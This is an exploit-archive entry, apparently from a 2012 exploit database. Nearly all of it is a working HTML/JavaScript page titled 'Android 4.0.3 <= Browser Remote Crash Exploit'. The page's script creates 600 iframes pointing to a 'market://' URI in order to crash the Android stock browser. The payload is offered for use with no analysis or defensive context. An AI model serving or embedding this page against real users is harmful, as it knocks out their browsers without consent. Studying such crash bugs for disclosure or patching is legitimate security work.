Android 4.0.3 <= Browser Remote Crash Exploit



EKU-ID: 2835 CVE: OSVDB-ID:
Author: Jean Pascal Pereira Published: 2012-12-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<!DOCTYPE html>
<!--

---------------------------------------------
Android 4.0.3 <= Browser Remote Crash Exploit
---------------------------------------------

Credit: Jean Pascal Pereira <pereira@secbiz.de>

http://www.0xffe4.org

-->
<html>
<body>

<script type="text/javascript">

var m_frame = "";

for(var i = 0; i < 600; i++)
{

  m_frame = document.createElement("iframe");
  m_frame.setAttribute("src", "market://a");

  document.body.appendChild(m_frame);
}
</script>

</body>
</html>